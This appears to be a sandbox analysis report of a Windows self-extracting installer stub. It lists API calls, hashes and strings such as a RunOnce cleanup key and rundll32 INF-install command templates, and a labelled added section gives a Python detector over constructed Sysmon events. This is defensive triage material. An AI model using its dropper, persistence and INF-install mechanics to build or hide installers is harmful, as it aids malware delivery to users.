  • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF7A8CC2CE1), ref: 00007FF7A8CC666F
    • Part of subcall function 00007FF7A8CC63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF7A8CC2CE1), ref: 00007FF7A8CC6423
    • Part of subcall function 00007FF7A8CC63B8: GetFileAttributesA.KERNELBASE ref: 00007FF7A8CC6432
    • Part of subcall function 00007FF7A8CC63B8: GetTempFileNameA.KERNEL32 ref: 00007FF7A8CC645B
    • Part of subcall function 00007FF7A8CC63B8: DeleteFileA.KERNEL32 ref: 00007FF7A8CC6473
    • Part of subcall function 00007FF7A8CC63B8: CreateDirectoryA.KERNEL32 ref: 00007FF7A8CC6484
Similarity
  • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
  • API String ID: 1979080616-186922987
  • Opcode ID: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
  • Instruction ID: fc3e2d1129bcba490da25f33f54312d12262aa2cb513cf46001ab79e04d63763
  • Opcode Fuzzy Hash: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
  • Instruction Fuzzy Hash: 495184F1E0F64281FB50AB2599106B5E7A0AF44740FDA60B9D94E437B5DF3CE409CB28

Similarity
  • API ID: Handle$AddressCloseExitModuleProcVersionWindows
  • String ID: @$HeapSetInformation$Kernel32.dll
  • API String ID: 1302179841-1204263913
  • Opcode ID: 91cf7217d730e16829238764ce0eddd89ffa8fd2b17e338e81c8c80914c49845
  • Instruction ID: b59f52ee25d2458b07a3d19e6730e4f4aff17bbed604b498958b990c81317ebe
  • Opcode Fuzzy Hash: 91cf7217d730e16829238764ce0eddd89ffa8fd2b17e338e81c8c80914c49845
  • Instruction Fuzzy Hash: BF3152F1E0A64286FB607B20A440275F690AF65B40FC661B5DA4D436B9EF7CE444CE28
Similarity
  • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
  • String ID:
  • API String ID: 836429354-0
  • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
  • Instruction ID: ee267cb2025963ed77fdcf9595248aafa378f932eb440bdc9b6d95b63585b6a0
  • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
  • Instruction Fuzzy Hash: 685182B261AB81C5EB11AF20E8402F8F7A1FB45B84FC591B1DA4D036A4DF3CD909CB14

Similarity
  • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
  • API String ID: 3049360512-2202052387
  • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
  • Instruction ID: 4e2ba8621a5b201c6cda13e1c0175b6497c2622a4f59b99c22dad3509d079754
  • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
  • Instruction Fuzzy Hash: 4F5142B1A0A642C6EB10AB14E4447B9F7A0FB45745FCA61B5D64D437B0CF3CE409CB28

Similarity
  • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
  • String ID: Mira$rce.
  • API String ID: 2929476258-3314896916
  • Opcode ID: d01d15b3b6bc5348d8e1e4290b799411aa9174f53e9f7f21c0e7d225e718463d
  • Instruction ID: d03b86906ceabf8130b8e2712f78292cca178c9795cd17eddebb6044f621e1c4
  • Opcode Fuzzy Hash: d01d15b3b6bc5348d8e1e4290b799411aa9174f53e9f7f21c0e7d225e718463d
  • Instruction Fuzzy Hash: E761E8A1E0A7C186FB11AB25A4003B5EA90FF59754F8662B0DE4D437E1DF3CE585CB24

Similarity
  • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
  • String ID:
  • API String ID: 3183975587-3916222277
  • Opcode ID: e21b509cffe8503fd7179222637d6c67e2ff5f5646c012befc4f1d87719c6888
  • Instruction ID: 43475e60e4898c9a2a72a77b6376a99ad7049755fdfd7dfa0e1f7a4d57a4b88f
  • Opcode Fuzzy Hash: e21b509cffe8503fd7179222637d6c67e2ff5f5646c012befc4f1d87719c6888
  • Instruction Fuzzy Hash: 1151C5B290A681C6F760AF10E444379FBA0FB88755F86A175EA4D826B4CF7CD444CF28

Similarity
  • API ID: OpenQuery$CloseInfoValue
  • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
  • API String ID: 2209512893-559176071
  • Opcode ID: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
  • Instruction ID: 2862ee1e1f99dedf817a4c258d7ce58c2008bec3bf3af0c3428a0fd94fe7f115
  • Opcode Fuzzy Hash: ed84ebcdca9ba12ea1915114950aff5f0d43cebd3ec67e9f63dd23e0e0abc583
  • Instruction Fuzzy Hash: 19318E72A08B41CBD720AF25E8406A9F7A4FB88754F856675EA8D43F64DF38D054CF14

Similarity
  • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
  • String ID: IXP$IXP%03d.TMP
  • API String ID: 1082909758-3932986939
  • Opcode ID: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
  • Instruction ID: b489f1cc0284eb1947f1d38f62502bbc884356897084cdd255894f0c7755e405
  • Opcode Fuzzy Hash: a8932f2c933087a6f7710ab058026970ef7685da5f8c2755a45c3c5b36be9ab1
  • Instruction Fuzzy Hash: E72173B160994186E710AB12E9503F9F651FB8DB81FC6A170DD4E477B1CF3CD44ACA14

Control-flow Graph

Control-flow graph (text dump) of the function at 00007FF7A8CC8200, basic blocks 651-699; the original rendering marks each block as executed or not executed. Calls reached from its blocks: GetStartupInfoW, Sleep, _amsg_exit, _initterm, _ismbblead, exit, _cexit, plus the internal subroutines 00007FF7A8CC8964, 00007FF7A8CC88D0 and 00007FF7A8CC2C54. This call sequence is the MSVC C runtime start-up routine, with 00007FF7A8CC2C54 in the position of the application entry point (WinMain/main) whose return value is passed to exit.
Similarity
  • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
  • String ID:
  • API String ID: 2995914023-0
  • Opcode ID: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
  • Instruction ID: 249d329a2f932d521fddb8cd848f2755645102d2b5e7050e2a8a3b934d76c245
  • Opcode Fuzzy Hash: d49111f4b884f1987b7511ab97b886bea71faf8ec09ccfccceaf9d5ebbbc5980
  • Instruction Fuzzy Hash: 0B5183B190E64286F7A0AB60E854376E7A0FB44755FC630B1D94D826B0DF3CE655CF28
APIs
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5078
    • Part of subcall function 00007FF7A8CC5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5089
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50AF
    • Part of subcall function 00007FF7A8CC5050: LoadResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50C0
    • Part of subcall function 00007FF7A8CC5050: LockResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50CF
    • Part of subcall function 00007FF7A8CC5050: memcpy_s.MSVCRT ref: 00007FF7A8CC50EE
    • Part of subcall function 00007FF7A8CC5050: FreeResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50FD
  • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7A8CC3123), ref: 00007FF7A8CC60C9
  • LocalFree.KERNEL32 ref: 00007FF7A8CC6142
    • Part of subcall function 00007FF7A8CC4DCC: LoadStringA.USER32 ref: 00007FF7A8CC4E60
    • Part of subcall function 00007FF7A8CC4DCC: MessageBoxA.USER32 ref: 00007FF7A8CC4EA0
    • Part of subcall function 00007FF7A8CC7700: GetLastError.KERNEL32 ref: 00007FF7A8CC7704
Similarity
  • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
  • String ID: $<None>$UPROMPT
  • API String ID: 957408736-2569542085
  • Opcode ID: 7abbca11000329c2f37ab55ab60ccce920bf3b4aa4237eb4f55f589dacc1068b
  • Instruction ID: 1fc3b39e237bb40b7a402f6638e8a8d1d71cba515432cc1ff13e0ce01c59b540
  • Opcode Fuzzy Hash: 7abbca11000329c2f37ab55ab60ccce920bf3b4aa4237eb4f55f589dacc1068b
  • Instruction Fuzzy Hash: 1C3185F1E0A24287F7207B60E55077AFA61FB85745F82A1B8DA0E42AA1DF7DD0048F18
Similarity
  • API ID: CreateFile$lstrcmp
  • String ID: *MEMCAB
  • API String ID: 1301100335-3211172518
  • Opcode ID: 1554ed486bc7cac90ef3253e660ad31e834894ade489ea310015c337a2cd6deb
  • Instruction ID: b078a1fb87168d539c26e00813a1ef9c163f94d5a04cdcb31ef0776c327bef3d
  • Opcode Fuzzy Hash: 1554ed486bc7cac90ef3253e660ad31e834894ade489ea310015c337a2cd6deb
  • Instruction Fuzzy Hash: 8961D9F2909B4186F7609B14A480379FA91F745B75F8663B1DA6E027E0CF3CE0458F28
Similarity
  • API ID: FileTime$AttributesDateItemLocalText
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
  • API String ID: 851750970-2312194364
  • Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
  • Instruction ID: 9ecd082f8f15b391698e7c8b4a4baefd96a24939a3e9cf68a7dfa5384d3f469c
  • Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
  • Instruction Fuzzy Hash: 2A51D8B2A1EA4281EB50AB12D4401BDE790FB48B91FC661B1DA4E436B5CE3CE545CB68
Similarity
  • API ID: AllocLocal
  • String ID: TMP4351$.TMP
  • API String ID: 3494564517-2619824408
  • Opcode ID: c8f4614371db3ca6a9d3f321fd37180daf8d29d03274309caa627389ef350ab6
  • Instruction ID: c3238a353d555b99468a7f8b43c57dfa8ae3b44217fb3b7db96c6dcadc65641f
  • Opcode Fuzzy Hash: c8f4614371db3ca6a9d3f321fd37180daf8d29d03274309caa627389ef350ab6
  • Instruction Fuzzy Hash: A631B3B1A0964187F710AB25A41037AFA50FB85BB5F8563B4DA6E03BE5CF3CD4068B18
Similarity
  • API ID: Message$Peek$DispatchMultipleObjectsWait
  • String ID:
  • API String ID: 2776232527-0
  • Opcode ID: 302dad1333796cede5321f5903fce61648418cd9c6d046aa706df1c59a6c2d53
  • Instruction ID: e652be52b28bcd0493df96bb3495e86607643a3da2b34e588e6d1a85c093c9d0
  • Opcode Fuzzy Hash: 302dad1333796cede5321f5903fce61648418cd9c6d046aa706df1c59a6c2d53
  • Instruction Fuzzy Hash: B9115472A29642C7E7A0AF30F454A76EA90FB95745F81A170D64A42994DF3CD048CF14
APIs
    • Part of subcall function 00007FF7A8CC3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7A8CC3A09), ref: 00007FF7A8CC3B64
    • Part of subcall function 00007FF7A8CC3B40: PeekMessageA.USER32 ref: 00007FF7A8CC3B89
    • Part of subcall function 00007FF7A8CC3B40: PeekMessageA.USER32 ref: 00007FF7A8CC3BCD
  • WriteFile.KERNELBASE ref: 00007FF7A8CC56E4
Similarity
  • API ID: MessagePeek$FileMultipleObjectsWaitWrite
  • String ID:
  • API String ID: 1084409-0
  • Opcode ID: 5420669727f17c0981b348259a16efeb7c1a97139cf77fc2b0c1398b9072be99
  • Instruction ID: 9691c8ae33c1f10b32206b67bb3f8035eed1c2eb5101da499a3e582770876a2d
  • Opcode Fuzzy Hash: 5420669727f17c0981b348259a16efeb7c1a97139cf77fc2b0c1398b9072be99
  • Instruction Fuzzy Hash: 6E21C2A0A1A50282E7109F16E840735FB60FB84B94FD59274DA2D06AB5CF3CD054CF18
Similarity
  • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
  • String ID:
  • API String ID: 2018477427-0
  • Opcode ID: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
  • Instruction ID: 50b04db940ba5aab8ccb904b849607e379de112d1c169247c383806e65dbe222
  • Opcode Fuzzy Hash: ded777603aae7cf846a654b588ac2905db21abed33c2a04ac96d39e62aa9a68d
  • Instruction Fuzzy Hash: 9911ACF1D0E64282F7506B10A5843B5E6E0FB45759FDA62B0D98C02AF5CF7DE485CB18
Similarity
  • API ID: CharPrev
  • String ID:
  • API String ID: 122130370-0
  • Opcode ID: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
  • Instruction ID: 44b92f44265f48dae8c42ac872be3c8e98dae27bd6e787dd90a1c82ff481d449
  • Opcode Fuzzy Hash: fe64812d24aaa535377f96cafa4c6c3212caf3ba105ea9cba34c300c858a7088
  • Instruction Fuzzy Hash: B20149A190D7D286F3016F19A84436DFBA0E701BE0F99B2B0DB69077E5CF2CD4428B58
Similarity
  • API ID: CloseHandle
  • String ID:
  • API String ID: 2962429428-0
  • Opcode ID: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
  • Instruction ID: ada5b055d8488618ddf1801208021bd9c1d2c0bcd573bba9fdb694791f63ffaf
  • Opcode Fuzzy Hash: b743c40088155ea186d23191c44c420b4fd161faa50afe9f4e766b5de3d239a5
  • Instruction Fuzzy Hash: DFF06271A19781C2DB1C5F25F580178F660FB48B59F465275DA2B46694CF3CD4D0CB24

Non-executed Functions

Similarity
  • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
  • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
  • API String ID: 383838535-2617288360
  • Opcode ID: 778cf6c626d3734d743f95605d23599f2518d83d8826cc93d245002d646ef5f5
  • Instruction ID: c7a3d21b0aa0f6e21cff79e76d04f179d37bea9c7dd2f58c84d1c48e80ab17c1
  • Opcode Fuzzy Hash: 778cf6c626d3734d743f95605d23599f2518d83d8826cc93d245002d646ef5f5
  • Instruction Fuzzy Hash: C7E116A2A0A78285EF11AF11D4102F9FBA0FB45744FD561B6DA8D037A4DF3CD90ACB14
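The strings recorded in this section fit together as one mechanism: the stub formats an extraction directory name with IXP%03d.TMP under %TEMP% (the function above with String ID IXP$IXP%03d.TMP), extracts into it, writes the RunOnce value wextract_cleanup0 whose data runs rundll32.exe with advpack.dll,DelNodeRunDLL32 to delete that directory at the next logon, and this non-executed routine builds the command rundll32.exe %s,InstallHinfSection %s 128 %s to run an INF's DefaultInstall section through setupapi.dll (or Command.com /c for a .BAT). These are the standard artefacts of the Windows IExpress/WExtract self-extractor stub; what such a package actually does is decided by the embedded cabinet and INF, not by the stub, so triage should focus on what is extracted and installed. The detector below is an added example for this report, not code from the sample, from Joe Sandbox or from Microsoft. It runs over constructed Sysmon-style registry (EventID 13) and process-creation (EventID 1) dictionaries that mirror the fields shown in this report; the field names, the file names dropped.exe and payload.inf, and every process ID other than 7084 are assumptions.

```python
"""Flag IExpress/WExtract self-extractor artefacts in Sysmon-style events.

Added example for this report; not code from the sample, Joe Sandbox or
Microsoft. SAMPLE_EVENTS is constructed telemetry mirroring the registry
(EventID 13) and process-creation (EventID 1) fields the report shows.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

# Extraction directory: the stub formats "IXP%03d.TMP" under %TEMP%,
# incrementing the counter until CreateDirectoryA succeeds.
IXP_DIR_RE = re.compile(r"(?i)\\Temp\\(IXP\d{3}\.TMP)(?=\\|$)")

# Cleanup persistence: RunOnce value "wextract_cleanup<N>" whose data runs
# rundll32.exe <path>\advpack.dll,DelNodeRunDLL32 "<extraction dir>".
CLEANUP_KEY_RE = re.compile(
    r"(?i)\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\wextract_cleanup(\d+)$")
CLEANUP_CMD_RE = re.compile(
    r'(?i)rundll32(?:\.exe)?\s+\S*advpack\.dll,DelNodeRunDLL32\s+"?([^"]+?)"?\s*$')

# Post-extraction install: "rundll32.exe %s,InstallHinfSection %s 128 %s"
INF_INSTALL_RE = re.compile(
    r"(?i)rundll32(?:\.exe)?\s+(?P<dll>\S+),InstallHinfSection\s+"
    r"(?P<section>\S+)\s+128\s+(?P<inf>\S+)")


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    ixp_dir: Optional[str]  # IXPnnn.TMP directory the artefact refers to
    detail: str


def ixp_dir_in(path: str) -> Optional[str]:
    m = IXP_DIR_RE.search(path or "")
    return m.group(1).upper() if m else None


def check_registry(ev: dict) -> Optional[Finding]:
    """EventID 13 (value set): the stub's RunOnce cleanup entry."""
    if ev.get("EventID") != 13:
        return None
    key = CLEANUP_KEY_RE.search(ev.get("TargetObject", ""))
    if not key:
        return None
    cmd = CLEANUP_CMD_RE.search(ev.get("Details", ""))
    target = cmd.group(1).strip() if cmd else ""
    return Finding("wextract_runonce_cleanup", ev["ProcessId"], ixp_dir_in(target),
                   "wextract_cleanup%s deletes %s" % (key.group(1), target or "<unparsed>"))


def check_process(ev: dict) -> List[Finding]:
    """EventID 1 (process create): INF install via rundll32, or any image
    executing out of an IXPnnn.TMP extraction directory."""
    out: List[Finding] = []
    if ev.get("EventID") != 1:
        return out
    m = INF_INSTALL_RE.search(ev.get("CommandLine", ""))
    if m:
        out.append(Finding("inf_install_via_rundll32", ev["ProcessId"], ixp_dir_in(m.group("inf")),
                           "%s section=%s inf=%s" % (m.group("dll"), m.group("section"), m.group("inf"))))
    image_dir = ixp_dir_in(ev.get("Image", ""))
    if image_dir:
        out.append(Finding("exec_from_ixp_tempdir", ev["ProcessId"], image_dir, ev["Image"]))
    return out


def scan(events: Iterable[dict]) -> List[Finding]:
    findings: List[Finding] = []
    for ev in events:
        reg = check_registry(ev)
        if reg:
            findings.append(reg)
        findings.extend(check_process(ev))
    return findings


def extraction_dirs(findings: Iterable[Finding]) -> Set[str]:
    """Distinct IXPnnn.TMP directories that tie the findings together."""
    return {f.ixp_dir for f in findings if f.ixp_dir}


# Constructed events (not real telemetry). The first mirrors the RunOnce
# write in this report; dropped.exe and payload.inf are assumed names.
SAMPLE_EVENTS = [
    {"EventID": 13, "ProcessId": 7084,
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0",
     "Details": r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"'},
    {"EventID": 1, "ProcessId": 7100, "ParentProcessId": 7084, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Users\user\AppData\Local\Temp\IXP000.TMP\payload.inf"},
    {"EventID": 1, "ProcessId": 7112, "ParentProcessId": 7084,
     "Image": r"C:\Users\user\AppData\Local\Temp\IXP000.TMP\dropped.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Temp\IXP000.TMP\dropped.exe"'},
    {"EventID": 13, "ProcessId": 900,  # benign autorun write, must not match
     "TargetObject": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"%windir%\system32\SecurityHealthSystray.exe"},
    {"EventID": 1, "ProcessId": 7200, "ParentProcessId": 900,
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.rule, f.pid, f.ixp_dir, f.detail)
```

The three rules deliberately key on the IXPnnn.TMP directory name so that the cleanup value, the INF install and anything launched from the extraction folder can be tied to one package by extraction_dirs(); the benign Run-key write and the unrelated process in the sample produce no finding.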
Similarity
  • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
  • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Mira
APIs
Similarity
  • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
  • String ID:
APIs
Strings
Similarity
  • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
  • String ID: SeShutdownPrivilege
APIs
Similarity
  • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
  • String ID:
APIs
Similarity
  • API ID: ExceptionFilterUnhandled
  • String ID:
APIs
Strings
Similarity
  • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
  • String ID: "$:$@$RegServer
APIs
Strings
Similarity
  • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
  • String ID: $Mira
APIs
  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4A86
  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4AAA
  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4ACA
  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4AEC
  • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4B1B
  • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4B3A
  • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4B54
  • FreeLibrary.KERNEL32 ref: 00007FF7A8CC4BF1
  • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7A8CC35E3), ref: 00007FF7A8CC4C0D
Strings
Similarity
  • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
  • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
APIs
Strings
Similarity
  • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
  • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
APIs
Strings
Similarity
  • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
  • String ID: Mira
APIs
Strings
Similarity
  • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
  • String ID: Control Panel\Desktop\ResourceLocale
APIs
Strings
Similarity
  • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
  • String ID: CheckTokenMembership$advapi32.dll
APIs
Similarity
  • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
  • String ID:
APIs
Similarity
  • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
  • String ID:
APIs
Similarity
  • API ID: Window$CapsDeviceRect$Release
  • String ID:
APIs
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5078
    • Part of subcall function 00007FF7A8CC5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5089
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50AF
    • Part of subcall function 00007FF7A8CC5050: LoadResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50C0
    • Part of subcall function 00007FF7A8CC5050: LockResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50CF
    • Part of subcall function 00007FF7A8CC5050: memcpy_s.MSVCRT ref: 00007FF7A8CC50EE
    • Part of subcall function 00007FF7A8CC5050: FreeResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50FD
  • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7A8CC3139), ref: 00007FF7A8CC3F95
  • LocalFree.KERNEL32 ref: 00007FF7A8CC4018
    • Part of subcall function 00007FF7A8CC4DCC: LoadStringA.USER32 ref: 00007FF7A8CC4E60
    • Part of subcall function 00007FF7A8CC4DCC: MessageBoxA.USER32 ref: 00007FF7A8CC4EA0
    • Part of subcall function 00007FF7A8CC7700: GetLastError.KERNEL32 ref: 00007FF7A8CC7704
  • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7A8CC3139), ref: 00007FF7A8CC403E
  • LocalFree.KERNEL32(?,?,?,?,?,00007FF7A8CC3139), ref: 00007FF7A8CC409F
    • Part of subcall function 00007FF7A8CC7AC8: FindResourceA.KERNEL32 ref: 00007FF7A8CC7AF2
    • Part of subcall function 00007FF7A8CC7AC8: LoadResource.KERNEL32 ref: 00007FF7A8CC7B09
    • Part of subcall function 00007FF7A8CC7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7A8CC7B3F
    • Part of subcall function 00007FF7A8CC7AC8: FreeResource.KERNEL32 ref: 00007FF7A8CC7B51
  • LocalFree.KERNEL32 ref: 00007FF7A8CC4078
Strings
Similarity
  • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
  • String ID: <None>$LICENSE
APIs
    • Part of subcall function 00007FF7A8CC114C: _vsnprintf.MSVCRT ref: 00007FF7A8CC1189
  • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC7763
  • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC7772
  • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC77B8
  • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC77EC
  • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7A8CC606F), ref: 00007FF7A8CC7805
Strings
Similarity
  • API ID: Resource$Free$FindLoadLock_vsnprintf
  • String ID: UPDFILE%lu
APIs
Similarity
  • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
  • String ID:
APIs
Strings
Similarity
  • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
  • String ID: wininit.ini
APIs
Strings
Similarity
  • API ID: Window$Text$DesktopDialogForegroundItem
  • String ID: Mira
APIs
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5078
    • Part of subcall function 00007FF7A8CC5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC5089
    • Part of subcall function 00007FF7A8CC5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50AF
    • Part of subcall function 00007FF7A8CC5050: LoadResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50C0
    • Part of subcall function 00007FF7A8CC5050: LockResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50CF
    • Part of subcall function 00007FF7A8CC5050: memcpy_s.MSVCRT ref: 00007FF7A8CC50EE
    • Part of subcall function 00007FF7A8CC5050: FreeResource.KERNEL32(?,?,00000000,00007FF7A8CC2E43), ref: 00007FF7A8CC50FD
  • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7A8CC3388), ref: 00007FF7A8CC4975
  • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7A8CC3388), ref: 00007FF7A8CC4A11
    • Part of subcall function 00007FF7A8CC4DCC: LoadStringA.USER32 ref: 00007FF7A8CC4E60
    • Part of subcall function 00007FF7A8CC4DCC: MessageBoxA.USER32 ref: 00007FF7A8CC4EA0
Strings
Similarity
  • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
  • String ID: <None>$@$FINISHMSG
APIs
Strings
Similarity
  • API ID: LibraryLoad$AttributesFile
  • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
APIs
Similarity
  • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
  • String ID:
APIs
  • GetVersionExA.KERNEL32 ref: 00007FF7A8CC3C3F
  • MessageBeep.USER32 ref: 00007FF7A8CC3EB9
    • Part of subcall function 00007FF7A8CC7F04: GetVersionExA.KERNEL32 ref: 00007FF7A8CC7F59
    • Part of subcall function 00007FF7A8CC7F04: GetSystemMetrics.USER32 ref: 00007FF7A8CC7F93
    • Part of subcall function 00007FF7A8CC7F04: RegOpenKeyExA.ADVAPI32 ref: 00007FF7A8CC7FC8
    • Part of subcall function 00007FF7A8CC7F04: RegQueryValueExA.ADVAPI32 ref: 00007FF7A8CC8003
    • Part of subcall function 00007FF7A8CC7F04: RegCloseKey.ADVAPI32 ref: 00007FF7A8CC8016
